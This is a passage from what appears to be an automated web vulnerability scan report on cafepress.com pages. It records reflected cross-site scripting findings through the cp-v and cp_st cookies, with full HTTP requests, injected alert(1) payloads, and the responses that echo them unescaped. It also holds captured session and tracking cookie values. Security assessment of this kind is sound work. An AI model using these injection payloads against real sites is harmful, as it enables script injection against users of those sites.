s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 69636
Date: Sun, 26 Dec 2010 13:47:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 69636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '9b326</script><script>alert(1)</script>7b9d98d964e'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.106. http://www.cafepress.com/make/custom-ipad-case [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-ipad-case

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8db02"-alert(1)-"9bd63bb7d30 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-ipad-case HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8db02"-alert(1)-"9bd63bb7d30; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 55461
Date: Sun, 26 Dec 2010 13:48:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8db02"-alert(1)-"9bd63bb7d30";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.107. http://www.cafepress.com/make/custom-ipad-case [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-ipad-case

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc4d</script><script>alert(1)</script>d48aac4b022 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-ipad-case HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ccc4d</script><script>alert(1)</script>d48aac4b022; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 55481
Date: Sun, 26 Dec 2010 13:48:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'ccc4d</script><script>alert(1)</script>d48aac4b022'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.108. http://www.cafepress.com/make/custom-iphone-cases [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-iphone-cases

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51aff"-alert(1)-"90ad1b3827e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA51aff"-alert(1)-"90ad1b3827e; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 57100
Date: Sun, 26 Dec 2010 13:48:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA51aff"-alert(1)-"90ad1b3827e";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.109. http://www.cafepress.com/make/custom-iphone-cases [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-iphone-cases

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c70c</script><script>alert(1)</script>36986f285d4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=3c70c</script><script>alert(1)</script>36986f285d4; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 57121
Date: Sun, 26 Dec 2010 13:48:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '3c70c</script><script>alert(1)</script>36986f285d4'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.110. http://www.cafepress.com/make/custom-mugs [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-mugs

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46ce6"-alert(1)-"366e3ae2b93 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA46ce6"-alert(1)-"366e3ae2b93; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 53742
Date: Sun, 26 Dec 2010 13:48:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 53742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA46ce6"-alert(1)-"366e3ae2b93";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.111. http://www.cafepress.com/make/custom-mugs [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-mugs

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0403</script><script>alert(1)</script>51550576faa was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
